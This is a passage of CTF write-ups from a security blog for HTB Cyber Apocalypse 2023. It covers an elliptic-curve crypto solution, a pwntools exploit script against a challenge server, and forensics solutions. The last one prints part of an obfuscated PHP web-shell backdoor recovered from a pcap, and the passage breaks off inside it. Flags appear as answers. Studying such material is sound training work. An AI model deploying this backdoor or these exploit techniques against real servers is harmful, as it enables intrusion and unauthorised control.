class="se">\&#39;</span><span class="s1">s dangerous however to go alone. Take this: &#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">FLAG</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;The vessels will never be found...&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">exit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Configure origin point first&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;Invalid option, sutting down&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">exit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="sa">f</span><span class="s1">&#39;An error occured: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s1">&#39;</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">response</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">exit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">assert</span> <span class="n">p</span><span class="o">.</span><span class="n">bit_length</span><span class="p">()</span> <span class="o">==</span> <span class="mi">256</span> </span></span><span class="line"><span class="cl"> <span class="n">main</span><span class="p">()</span> </span></span></code></pre></div><p>So, for any \(i\neq j\), $$a \equiv \dfrac{Y_i^2-Y_j^2-X_i^3+X_j^3}{X_i-X_j} \pmod{p}$$</p> <p>Which means for any distinct \(i,j,k,l\), $$(Y_i^2-Y_j^2-X_i^3+X_j^3)(X_k-X_l)-(Y_k^2-Y_l^2-X_k^3+X_l^3)(X_i-X_j) \equiv 0 \pmod{p}$$</p> <p>So by playing with several $i,j,k,l$ and take GCD stuff, we obtain $$p=91720173941422125335466921700213991383508377854521057423162397714341988797837$$.</p> <p>Also, we can find \(a\) and \(b\) by consider the equation system $$Y_i^2-X_i^3=aX_i+b \text{ for }i=1,2$$.</p> <p>We get that $$a=57186237363769678415558546920636910250184560730836527033755705455333464722170$$, $$b=47572366756434660406002599832623767973471965640106574131304711893212728437629$$</p> <p>Now the important thing is to note that: \(|E/\mathbb{F}_p|=p\), thus we can easily solve the discrete log problem on \(E\) using <code>Smart's attack</code>. In addition, we only need to consider the RNG in modulo \(p\).</p> <p>Back to the challenge, we see the challenge is almost equivalent: Given \(P,x^2\times P\), find \((ax^3+bx+C)\times P\). To do this, we need to find \(x\) .Fortunately, because the DL problem is easy, we can easily find \(x\). The attack is described as follow:</p> <ol> <li> <p>Let \(P\) be any point on the curve.</p> </li> <li> <p>Let the current round be \(i\), we can use <code>Option 2</code> to get the value \(r[i]^2\times P\). At this time, \(state.P=r[i]\times P\).</p> </li> <li> <p>Use Smart&rsquo;s attack to restore \(r[i]^2\), then restore \(r[i]\) with probability \(\dfrac{1}{2}\).</p> </li> <li> <p>Calculate \(predict=ar[i]^3+br[i]+C \pmod{p}\).</p> </li> <li> <p>Use <code>Option 1</code> and enter the coordinate of \(P[1]\). This will set \(state.P=P\) and the next point will be equal to \(r[i+1]\times P\).</p> </li> <li> <p>Enter <code>Option 3</code> and enter the coordinates of \(predict\times P[1]\).</p> </li> </ol> <p>The attack has \(\dfrac{1}{2}\) probability of success because we have \(\dfrac{1}{2}\) probability of getting the right \(r[i]\). So by doing this multiple times, we get the flag.</p> <p>Flag is: <strong>HTB{0Racl3_AS_a_f3A7Ur3_0n_W3aK_CURV3_aND_PRN9??_7H3_s3cur17Y_0F_0uR_CRyP70Sys73M_w1LL_c0LLAp53!!!}</strong></p> <h2 id="blokechain">Blokechain</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://github.com/sudo-rainman/ctf_script/tree/main/htb_cyberapocalypse2023/crypto_blokechain" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> After successfully locating the vessels and obtaining the relic, you and your team begin to strategize on how to destroy them. However, upon further examination, it becomes clear that the vessels are connected with advanced alien technology that simulates a blockchain. In order to destroy the pods, you realize that you need to possess the wealth of the entire galaxy. The fate of the Earth rests on your ability to find a solution to this seemingly impossible problem. Can you devise a plan to destroy the vessels and save humanity from their destructive power? Note: This challenge is not intended for beginners. It is an insane level of difficulty. Good luck and have fun!</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Insane</p> </li> </ul> <p>This challenge has an unintended solution where you can just resubmit the hash, lmao. R.I.P overthinkers.</p> <p>Here is the script:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s2">&#34;178.62.9.10&#34;</span><span class="p">,</span><span class="mi">30794</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">total</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"><span class="k">while</span> <span class="n">total</span> <span class="o">&lt;</span> <span class="mi">100000000</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;vessels</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;1&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;vessels</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;2&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">60</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;1&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">ans</span> <span class="o">=</span> <span class="p">[]</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="kc">True</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">temp</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="sa">b</span><span class="s2">&#34;Balance&#34;</span> <span class="ow">in</span> <span class="n">temp</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">temp</span> <span class="o">=</span> <span class="n">temp</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="s2">&#34;expected hash &#34;</span><span class="p">):</span><span class="nb">len</span><span class="p">(</span><span class="s2">&#34;expected hash &#34;</span><span class="p">)</span><span class="o">+</span><span class="mi">25</span><span class="p">]</span><span class="o">.</span><span class="n">decode</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">ans</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">temp</span><span class="p">,</span><span class="mi">16</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;vessels</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;2&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">ans1</span> <span class="o">=</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">*</span><span class="p">(</span><span class="mi">60</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">ans</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">ans1</span> <span class="o">=</span> <span class="n">ans1</span> <span class="o">+</span> <span class="n">ans</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">60</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;: &#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">ans1</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="kc">True</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">temp</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="sa">b</span><span class="s2">&#34;Balance&#34;</span> <span class="ow">in</span> <span class="n">temp</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">total</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">temp</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span><span class="o">.</span><span class="n">decode</span><span class="p">()[</span><span class="nb">len</span><span class="p">(</span><span class="s2">&#34;Balance: &#34;</span><span class="p">):])</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">total</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;vessels</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;3&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">recvline</span><span class="p">())</span> </span></span></code></pre></div><p>Flag is: <strong>HTB{7h3_vess3ls_4r3_des7r0yed_g0od_j0b}</strong></p> <h2 id="original-post">Original Post</h2> <ul> <li> <p><a href="https://fazect.github.io/htb2023/" target="_blank" rel="noopener">From FazeCT</a></p> </li> <li> <p><a href="https://junvalentine.github.io/posts/htb-wu-2023/#colliding-heritage" target="_blank" rel="noopener">From Onirique</a></p> </li> <li> <p><a href="https://haopham23.github.io/dashaus165blog/" target="_blank" rel="noopener">From dasHaus</a></p> </li> </ul>https://bkisc-blog.netlify.app/blog/bkisc/htb2023-for/Mon, 27 Mar 2023 00:00:00 +0000https://bkisc-blog.netlify.app/blog/bkisc/htb2023-for/<p> <ul class="tags-list"> <a href="https://bkisc-blog.netlify.app/tag/ctf/">ctf</a> <a href="https://bkisc-blog.netlify.app/tag/writeup/">writeup</a> <a href="https://bkisc-blog.netlify.app/tag/forensics/">forensics</a> <a href="https://bkisc-blog.netlify.app/tag/htb-2023/">htb-2023</a> </ul> <details class="toc-inpage d-print-none " open> <summary class="font-weight-bold">Table of Contents</summary> <nav id="TableOfContents"> <ul> <li><a href="#plaintext-tleasure">Plaintext Tleasure</a></li> <li><a href="#alien-cradle">Alien Cradle</a></li> <li><a href="#extraterrestrial-persistence">Extraterrestrial Persistence</a></li> <li><a href="#roten">Roten</a></li> <li><a href="#relic-maps">Relic Maps</a></li> <li><a href="#packet-cyclone">Packet Cyclone</a></li> <li><a href="#bashic-ransomware">Bashic Ransomware</a> <ul> <li><a href="#1-pcap-file">1. Pcap file</a></li> <li><a href="#2-bash-script-analyze">2. Bash script analyze</a></li> </ul> </li> <li><a href="#original-posts">Original Posts</a></li> </ul> </nav> </details> </p> <h2 id="plaintext-tleasure">Plaintext Tleasure</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1O77S-Ti8GErZxdZoYiTKEWsCBWn6Fp9b/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> Threat intelligence has found that the aliens operate through a command and control server hosted on their infrastructure. Pandora managed to penetrate their defenses and have access to their internal network. Because their server uses HTTP, Pandora captured the network traffic to steal the server&rsquo;s administrator credentials. Open the provided file using Wireshark, and locate the username and password of the admin.</p> </li> <li> <p><strong>Category:</strong> Forensics</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>We are given a network pcap file. Although we can solve this challenge using <a href="https://www.wireshark.org/" target="_blank" rel="noopener">Wireshark</a>, but to keep it simple for the very first challenge, we will use <a href="https://www.howtogeek.com/427805/how-to-use-the-strings-command-on-linux/" target="_blank" rel="noopener">strings</a> and <a href="https://www.geeksforgeeks.org/grep-command-in-unixlinux/" target="_blank" rel="noopener">grep</a> to get the flag.</p> <p>Here we use strings to dump out strings from the pcap file, then use pipe (<code>|</code>) and grep to find for strings that match the flag format - <code>HTB{</code>.</p> <img src="1.png" alt="linux" width="1000"/> <p>Flag is: <strong>HTB{th3s3_4l13ns_st1ll_us3_HTTP}</strong></p> <h2 id="alien-cradle">Alien Cradle</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/12HfCz9D5QnpK7kQBwjCINwv29T5sr6Nc/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> In an attempt for the aliens to find more information about the relic, they launched an attack targeting Pandora&rsquo;s close friends and partners that may know any secret information about it. During a recent incident believed to be operated by them, Pandora located a weird PowerShell script from the event logs, otherwise called PowerShell cradle. These scripts are usually used to download and execute the next stage of the attack. However, it seems obfuscated, and Pandora cannot understand it. Can you help her deobfuscate it?</p> </li> <li> <p><strong>Category:</strong> Forensics</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>For this challenge, we are given a Powershell Script file. In the script, the flag is being concatenated using some Powershell <del>magic</del> lines of code.</p> <p>Flag is: <strong>HTB{p0w3rsh3ll_Cr4dl3s_c4n_g3t_th3_j0b_d0n3}</strong></p> <h2 id="extraterrestrial-persistence">Extraterrestrial Persistence</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1-ySd0Z3kKvX3djL228eU0_vddZf4Pdn9/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> There is a rumor that aliens have developed a persistence mechanism that is impossible to detect. After investigating her recently compromised Linux server, Pandora found a possible sample of this mechanism. Can you analyze it and find out how they install their persistence?</p> </li> <li> <p><strong>Category:</strong> Forensics</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>In this challenge, we are given a shell script to look for the flag.</p> <p>For the sake of understanding the flow of shell scripting, the script checks whether the username is <code>Pandora</code> and the hostname is <code>linux_HQ</code>. If the check is fulfilled, it starts the process to write the base64 decoded message into the file <code>/usr/lib/systemd/system/service.service</code>.</p> <p>The decoded message turned out to contain the flag for our challenge.</p> <p>Flag is: <strong>HTB{th3s3_4l13nS_4r3_s00000_b4s1c}</strong></p> <h2 id="roten">Roten</h2> <ul> <li> <p><strong>Given zip:</strong> <a href="https://drive.google.com/drive/folders/1RfJHiudqPA7iTqNqsmIYHRZDYZzu7uEs?usp=share_link" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> The iMoS is responsible for collecting and analyzing targeting data across various galaxies. The data is collected through their webserver, which is accessible to authorized personnel only. However, the iMoS suspects that their webserver has been compromised, and they are unable to locate the source of the breach. They suspect that some kind of shell has been uploaded, but they are unable to find it. The iMoS have provided you with some network data to analyze, its up to you to save us.</p> </li> <li> <p><strong>Category:</strong> Forensics</p> </li> <li> <p><strong>Difficulty:</strong> Easy</p> </li> </ul> <p>After filtering the packets by <code>http.request.method == POST</code>, we saw an interesting packet there.</p> <img src="packets.png" alt="Packets" width="1000"/> <p>The packet 1929 has a MIME type of <code>application/x-php</code>, following the HTTP stream to see the php backdoor, we found this interesting php codes:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span> </span></span><span class="line"><span class="cl"><span class="nv">$pPziZoJiMpcu</span> <span class="o">=</span> <span class="mi">82</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$liGBOKxsOGMz</span> <span class="o">=</span> <span class="k">array</span><span class="p">();</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> <span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;&lt;nnyo ea</span><span class="se">\$</span><span class="s2">px-aloerl0=e r</span><span class="se">\$</span><span class="s2">0&#39; weme Su rgsr s</span><span class="se">\&#34;</span><span class="s2">eu&gt;</span><span class="se">\&#34;</span><span class="s2">e&#39;Er= elmi)y ]_&#39;t&gt;bde e e =p xt</span><span class="se">\&#34;</span><span class="s2"> ?ltps vdfic-xetrmsx&#39;l0em0 o</span><span class="se">\&#34;</span><span class="s2">oc&amp;&#39;t [r</span><span class="se">\&#34;</span><span class="s2">e _e;eV.ncxm&#39;vToil ,F y&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;&lt;r s -&lt;a </span><span class="se">\&#34;</span><span class="s2">op r_P&lt; poeeihaeild /ds</span><span class="se">\&#34;</span><span class="s2">se4bsxao1: r]du ;e</span><span class="se">\$</span><span class="s2">&#39;o,t dn</span><span class="se">\n</span><span class="s2">)i</span><span class="se">\$</span><span class="s2">&#39;me&#39;maoate{e I!lb&gt;&#39;u btde .sr ege/ han:t&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;elrlenjl t&gt;( 0&#39;eCdd0 l et0</span><span class="se">\n</span><span class="s2">&#39;seu u it ;e_ dc&gt;ulUd&#39;T</span><span class="se">\n</span><span class="s2">xe</span><span class="se">\$</span><span class="s2">L&lt;er&lt;.l oh&gt;c ii aert pdt iai(ed.QiJr</span><span class="se">\n\$</span><span class="s2">i0; 0</span><span class="se">\&#34;</span><span class="s2">e0&#39; d= ex ].xp</span><span class="se">\$</span><span class="s2">r re </span><span class="se">\n</span><span class="s2">wSn&#39;u&lt;lup ]o iluE/=&gt;b</span><span class="se">\$</span><span class="s2">t r&gt;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;h rxn ltmb </span><span class="se">\n</span><span class="s2">&#39;-aodd&#39;) bubaa</span><span class="se">\n</span><span class="s2">ff0 i0] )- [ &amp;</span><span class="se">\&#34;</span><span class="s2">4 ==e[wn (r #iEa tftelF)U sspSb</span><span class="se">\&#34;</span><span class="s2">&#39;rd dO o e_t ppso </span><span class="se">\n</span><span class="s2">]DpneaC;aoesvp</span><span class="se">\n</span><span class="s2">i( }f0 &amp; &#39; </span><span class="se">\&#34;</span><span class="s2">( ]0 =sc&#39;o </span><span class="se">\$</span><span class="s2">s #nRmaeoi=oi)p te&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;l[&gt;c;&gt;ia ew agP aw(d i;ep:rto</span><span class="se">\n</span><span class="s2">nor/a/&lt;l )</span><span class="se">\n</span><span class="s2">( = ?;</span><span class="se">\$</span><span class="s2">r</span><span class="se">\$</span><span class="s2">0 0 &#39;puwr</span><span class="se">\$\$</span><span class="s2">d</span><span class="se">\&#34;</span><span class="s2"> fgVeu&#39;rp&#39;al l s o&#39;&lt;o</span><span class="se">\n</span><span class="s2">&lt;rs rn </span><span class="se">\&#34;</span><span class="s2"> leeetu</span><span class="se">\$</span><span class="s2">y f</span><span class="se">\n</span><span class="s2">sl (en dtyjS3?e</span><span class="se">\$</span><span class="s2"> ) 0 </span><span class="se">\n</span><span class="s2">gem0= xrtrlsdi; l E=t&gt;ma</span><span class="se">\&#34;</span><span class="s2">d&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;e{o iafbl</span><span class="se">\n</span><span class="s2">b. }ee &lt; ptrchid&gt; cia&#39;&#39;t s qc.p)m{ </span><span class="se">\$</span><span class="s2"> (0&#39; rao0 ) &#39;ieid;ir</span><span class="se">\n</span><span class="s2"> adR&#39;o</span><span class="se">\\</span><span class="s2"> r.&#39;&#39;</span><span class="se">\n</span><span class="s2">a ifdiro &gt;&#39;</span><span class="se">\$\n</span><span class="s2">dr&lt;t apmh(di</span><span class="se">\&#34;</span><span class="s2"> ( rctE)&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;e mtlur3h;o m{</span><span class="se">\$</span><span class="s2">2x odd0( )n&#39;t[</span><span class="se">\n</span><span class="s2">r) gi[dcnat</span><span class="se">\$</span><span class="s2"> d n Dl&gt;r R k}</span><span class="se">\&#34;</span><span class="s2">&lt;tr twso</span><span class="se">\$</span><span class="s2">(r; i iatx;n iriei.p</span><span class="se">\n</span><span class="s2">d</span><span class="se">\$</span><span class="s2"> o m0&#39; u</span><span class="se">\&#34;</span><span class="s2">e1</span><span class="se">\$\$</span><span class="s2"> &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34; t]e&#39;} ) } r&#39;io</span><span class="se">\&#34;</span><span class="s2">c/_in &#39; (ie&#39;: e&amp;e</span><span class="se">\n</span><span class="s2">&gt;/b&gt; hu( df)</span><span class="se">\n</span><span class="s2"> s ptap</span><span class="se">\n</span><span class="s2">t nabrp6</span><span class="se">\n</span><span class="s2"> et d</span><span class="se">\$</span><span class="s2">o0 p] )ogi?f)&#39;r</span><span class="se">\n</span><span class="s2">= </span><span class="se">\n</span><span class="s2">=ePrm;tfGda&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34; ]e</span><span class="se">\&#34;</span><span class="s2">mrT;r s&amp;ye</span><span class="se">\n</span><span class="s2">to</span><span class="se">\&#34;</span><span class="s2"> (i</span><span class="se">\$\&#34;</span><span class="s2">ii e s tici - ipryt/</span><span class="se">\n</span><span class="s2"> y etd): [ &amp; wrf (;]e</span><span class="se">\n</span><span class="s2"> { cH&#39;p</span><span class="se">\n</span><span class="s2">ioE=m [c.oeo</span><span class="se">\n</span><span class="s2">e u c hd; </span><span class="se">\$</span><span class="s2">dd&lt;rl.c e iohr L fca/ jf &amp;p ye &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;</span><span class="se">\&#34;</span><span class="s2">= ?no(&#39;</span><span class="se">\&#34;\n</span><span class="s2">,a</span><span class="se">\n\$\n</span><span class="s2"> HtP leorT&#39;e &#39;h</span><span class="se">\$</span><span class="s2">vcU d l&#39;=h &gt;y</span><span class="se">\n</span><span class="s2"> d(it.e h t onme e idr1-su e &amp;p ?&#39; e 0 eu t% d</span><span class="se">\$</span><span class="s2">_ To_vecnm[f= nouetp </span><span class="se">\&#34;</span><span class="s2"> t.&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;&gt;o </span><span class="se">\n</span><span class="s2">&gt; eifrd&#39;o</span><span class="se">\&#34;</span><span class="s2">o ( n/es n eny.-/n 0=e e&amp; - x(0&#39;rp</span><span class="se">\$</span><span class="s2">&#39;1 </span><span class="se">\$</span><span class="s2">&#39;dP BrSath=-&#39;i&#39; a p_ol &gt; </span><span class="se">\$</span><span class="s2"> </span><span class="se">\n</span><span class="s2"> cri)&gt;/w&lt; </span><span class="se">\$</span><span class="s2">i🔛 g &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;d. 1&gt;bc x&#39;l0= &#39;&#39;</span><span class="se">\$</span><span class="s2">e</span><span class="se">\$</span><span class="s2">0x[[m s g]iO {yEleo&#39;ddls m</span><span class="se">\&#34;</span><span class="s2">luro E}o_</span><span class="se">\$\&#34;</span><span class="s2">&lt; &lt; h.l &lt;&#39;n/</span><span class="se">\&#34;</span><span class="s2"> _f ct t c-2</span><span class="se">\n</span><span class="s2">ot 2dsx&#39;0w;gcm0&#39;&#39;</span><span class="se">\&#34;</span><span class="s2">o:% r,rS W Lu= </span><span class="se">\&#34;</span><span class="s2">aieu</span><span class="se">\$</span><span class="s2">e&lt;opya r</span><span class="se">\n</span><span class="s2">fG&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;v&lt;t ? o&#39;e.a.et&lt; G Ft;0 h Co-.&lt;oi 0&#39;eAs0&#39;</span><span class="se">\n</span><span class="s2">ruo2 eed 1 o T 0</span><span class="se">\&#34;</span><span class="s2">Fe&#39;</span><span class="se">\&#34;</span><span class="s2">.trTbu&#39;bal)d r</span><span class="se">\n</span><span class="s2"> Eabh p /o </span><span class="se">\$</span><span class="s2">rd/ E(ie &#39; :eSm&gt;2stoi0; 0&#39;4 otd):xxe&#39;s u</span><span class="se">\$</span><span class="s2">=[ &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34; w &#39;=o&lt;</span><span class="se">\$</span><span class="s2">a&#39;omp]rdo)&#39; o}cTlre h </span><span class="se">\&#34;</span><span class="s2">&#39;w</span><span class="se">\&#34;</span><span class="s2">hv(&gt;t Tfltf) xS/</span><span class="se">\n</span><span class="s2">/csnf0 i0;0: uee ee T% pw &#39; </span><span class="se">\$</span><span class="s2">_.]</span><span class="se">\&#34;</span><span class="s2">f/_&#39;]Uil)&gt;Da ] r</span><span class="se">\n</span><span class="s2">o[u&gt;a p &lt;.n&lt;ra</span><span class="se">\$\\</span><span class="s2">a [ie-i; &#39;i b&lt;jrt ( }f0 0 &#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;p</span><span class="se">\&#34;</span><span class="s2"> ?&#39;cc&amp;&#39;1 [o</span><span class="se">\$</span><span class="s2">d dR ..ffS&gt;.pto;&lt;id{[} </span><span class="se">\n</span><span class="s2">m&#39;e</span><span class="se">\&#34;</span><span class="s2">d </span><span class="se">\n</span><span class="s2"> t</span><span class="se">\$</span><span class="s2">e/eldnb &#39;l sl</span><span class="se">\n</span><span class="s2"> t-osqirp )</span><span class="se">\n</span><span class="s2">( })&#39; []&amp; -uu ;s</span><span class="se">\$</span><span class="s2">&#39;r_ii iO</span><span class="se">\$\&#34;\$</span><span class="s2">&#39;oE&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;</span><span class="se">\\\&#34;</span><span class="s2">l&#39;a</span><span class="se">\n</span><span class="s2">bre</span><span class="se">\n</span><span class="s2">&#39; uimc);&gt; fidvrtfui</span><span class="se">\&#34;</span><span class="s2">l deTte .;-ocupar</span><span class="se">\$</span><span class="s2"> )</span><span class="se">\n</span><span class="s2"> - </span><span class="se">\&#34;</span><span class="s2"> &#39;&#39;tt0</span><span class="se">\n\&#34;</span><span class="s2">selGrf rtd&#39;d rRn&#39;o&gt;d red nepfam </span><span class="se">\n\n</span><span class="s2">&lt;o&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$iyzQ5h8qf6</span> <span class="o">.=</span> <span class="s2">&#34;f&gt;a(d=er;e o_rrn h </span><span class="se">\n</span><span class="s2">&gt;tretpim{ </span><span class="se">\$</span><span class="s2"> ?&#39; 